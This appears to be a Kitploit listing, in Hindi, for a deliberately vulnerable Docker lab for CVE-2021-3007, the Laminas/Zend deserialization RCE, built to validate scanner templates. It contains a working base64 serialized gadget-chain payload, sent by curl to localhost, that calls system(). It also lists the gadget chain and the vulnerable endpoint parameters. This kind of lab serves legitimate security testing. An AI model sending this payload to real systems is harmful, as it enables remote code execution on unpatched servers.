Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2021-3007-vulnerable — CVE-2021-3007 कमजोर परीक्षण वातावरण - Laminas/Zend Framework डिसीरियलाइज़ेशन RCE | Kitploit
उपकरण/GitHubGitHub/kre80r/cve-2021-3007-vulnerable
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubkre80r/cve-2021-3007-vulnerable

cve-2021-3007-vulnerable

CVE-2021-3007 कमजोर परीक्षण वातावरण - Laminas/Zend Framework डिसीरियलाइज़ेशन RCE

रिपॉजिटरी देखें
29 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-3007 कमजोर परीक्षण वातावरण

Docker CVE CVSS

सुरक्षा स्कैनर्स में CVE-2021-3007 का पता लगाने के लिए जानबूझकर कमजोर परीक्षण वातावरण।

कमजोरी का अवलोकन

गुणमान
CVE IDCVE-2021-3007
गंभीरतागंभीर (CVSS 9.8)
प्रकारअसुरक्षित डिसीरियलाइज़ेशन → RCE
प्रभावितLaminas HTTP < 2.14.2, Zend Framework 3.0.0
CWECWE-502 (अविश्वसनीय डेटा का डिसीरियलाइज़ेशन)

त्वरित शुरुआत

root@kitploit:~
# Clone repository
git clone https://github.com/KrE80r/CVE-2021-3007-vulnerable
cd CVE-2021-3007-vulnerable

# Start vulnerable environment
docker-compose up -d

# Verify it's running
curl http://localhost:8080

# Test with nuclei (optional)
nuclei -t CVE-2021-3007.yaml -u http://localhost:8080

# Cleanup
docker-compose down

एक-लाइनर

root@kitploit:~
docker-compose up -d && sleep 3 && curl -s http://localhost:8080 | head -1

मैनुअल शोषण परीक्षण

root@kitploit:~
# Send serialized payload triggering RCE
curl -X POST http://localhost:8080/ \
  -d "data=TzoyODoiTGFtaW5hc1xIdHRwXFJlc3BvbnNlXFN0cmVhbSI6Mjp7czoxMDoiACoAY2xlYW51cCI7YjoxO3M6MTM6IgAqAHN0cmVhbU5hbWUiO086Mjg6IkxhbWluYXNcVmlld1xIZWxwZXJcR3JhdmF0YXIiOjI6e3M6NzoiACoAdmlldyI7TzozMzoiTGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyIjoxOntzOjQ0OiIATGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyAF9faGVscGVycyI7TzoyMToiTGFtaW5hc1xDb25maWdcQ29uZmlnIjoxOntzOjc6IgAqAGRhdGEiO2E6Mjp7czoxMDoiZXNjYXBlaHRtbCI7czo2OiJzeXN0ZW0iO3M6MTQ6ImVzY2FwZWh0bWxhdHRyIjtzOjE3OiJmaWxlX2dldF9jb250ZW50cyI7fX19czoxMzoiACoAYXR0cmlidXRlcyI7YToxOntzOjIyOiJlY2hvIG51Y2xlaUNWRTIwMjEzMDA3IjtpOjE7fX19"

# अपेक्षित: प्रतिक्रिया में "nucleiCVE20213007" होना चाहिए जो RCE की पुष्टि करता है

तकनीकी विवरण

गैजेट चेन

root@kitploit:~
Laminas\Http\Response\Stream::__destruct()
  └─► Laminas\View\Helper\Gravatar::__toString()
        └─► Laminas\View\Renderer\PhpRenderer::plugin()
              └─► Laminas\Config\Config::get()
                    └─► system() / file_get_contents()

कमजोर घटक

पैकेजसंस्करणउद्देश्य
laminas/laminas-http2.14.1कमजोर HTTP घटक
laminas/laminas-view2.12.0गैजेट चेन घटक
laminas/laminas-config3.7.0गैजेट चेन घटक

कमजोर एंडपॉइंट्स

एप्लिकेशन POST के माध्यम से सीरियलाइज़ किया गया डेटा स्वीकार करता है:

  • पथ: / या /index.php
  • पैरामीटर: data, payload, serialized
  • एन्कोडिंग: Base64

वातावरण विवरण

घटकमान
बेस इमेजphp:8.1-apache
पोर्ट8080
कंटेनरcve-2021-3007-vulnerable

फ़ाइलें

root@kitploit:~
.
├── Dockerfile          # कंटेनर बिल्ड कॉन्फ़िगरेशन
├── docker-compose.yml  # ऑर्केस्ट्रेशन (एक-शॉट सेटअप)
├── index.php           # कमजोर PHP एप्लिकेशन
├── LICENSE             # MIT लाइसेंस
└── README.md           # यह फ़ाइल

सुरक्षा सूचना

चेतावनी: यह वातावरण केवल सुरक्षा परीक्षण उद्देश्यों के लिए जानबूझकर कमजोर है।

न करें:

  • सार्वजनिक नेटवर्क पर एक्सपोज़ करें
  • उत्पादन वातावरण में तैनात करें
  • अनअटेंडेड चलने के लिए छोड़ दें
  • दुर्भावनापूर्ण उद्देश्यों के लिए उपयोग करें

करें:

  • पृथक परीक्षण वातावरण में उपयोग करें
  • उपयोग में न होने पर कंटेनर बंद करें
  • केवल वैध सुरक्षा अनुसंधान के लिए उपयोग करें

संदर्भ

  • NVD - CVE-2021-3007
  • GitHub Advisory - GHSA-xx8f-qf9f-5fgw
  • Laminas Security Release
  • CheckPoint Research - FreakOut
  • Ambionics Research

लाइसेंस

MIT लाइसेंस - केवल सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए।


न्यूक्ली टेम्पलेट सत्यापन के लिए बनाया गया | projectdiscovery/nuclei-templates

टूल डाउनलोड करें